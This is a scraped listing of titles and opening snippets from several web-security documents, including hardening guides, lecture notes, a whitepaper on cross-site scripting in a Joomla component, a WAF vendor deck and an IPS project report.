Web Security - Hardening estudy Matthias Hecker, Andreas Schmidt, Philipp Promeuschel, Ivo Senner, Andre Rein, Bartosz Boron, Christian Ketter, Christian Thomas Weber Fachhochschule Giessen-Friedberg September
Table of Contents. Page 2/13
Page 1/13 Table of Contents Introduction...3 Top Reasons Firewalls Are Not Enough...3 Extreme Vulnerabilities...3 TD Ameritrade Security Breach...3 OWASP s Top 10 Web Application Security Vulnerabilities
FINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE
Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security
Lecture 11 Web Application Security (part 1)
Lecture 11 Web Application Security (part 1) Computer and Network Security 4th of January 2016 Computer Science and Engineering Department CSE Dep, ACS, UPB Lecture 11, Web Application Security (part 1)
Cross Site Scripting in Joomla Acajoom Component
Whitepaper Cross Site Scripting in Joomla Acajoom Component Vandan Joshi December 2011 TABLE OF CONTENTS Abstract... 3 Introduction... 3 A Likely Scenario... 5 The Exploit... 9 The Impact... 12 Recommended
Arrow ECS University 2015 Radware Hybrid Cloud WAF Service. 9 Ottobre 2015
Arrow ECS University 2015 Radware Hybrid Cloud WAF Service 9 Ottobre 2015 Get to Know Radware 2 Our Track Record Company Growth Over 10,000 Customers USD Millions 200.00 150.00 32% 144.1 16% 167.0 15%
FRIENDS OF SEARCH HARDENING WORDPRESS VARIOUS TWEAKS FOR BETTER WP SECURITY
FRIENDS OF SEARCH HARDENING WORDPRESS VARIOUS TWEAKS FOR BETTER WP SECURITY WHO HAD (TO FIX) A HACKED WORDPRESS? bg.vu/fos14 WHAT REALLY MATTERS: TOP 3! IF YOU HAVE 5 MINS TO SPARE, JUST DO THESE 92% (of
Common Security Vulnerabilities in Online Payment Systems
Common Security Vulnerabilities in Online Payment Systems Author- Hitesh Malviya(Information Security analyst) Qualifications: C!EH, EC!SA, MCITP, CCNA, MCP Current Position: CEO at HCF Infosec Limited
An Open Source IPS. IIT Network Security Project Project Team: Mike Smith, Sean Durkin, Kaebin Tan
An Open Source IPS IIT Network Security Project Project Team: Mike Smith, Sean Durkin, Kaebin Tan Introduction IPS or Intrusion Prevention System Uses a NIDS or Network Intrusion Detection System Includes
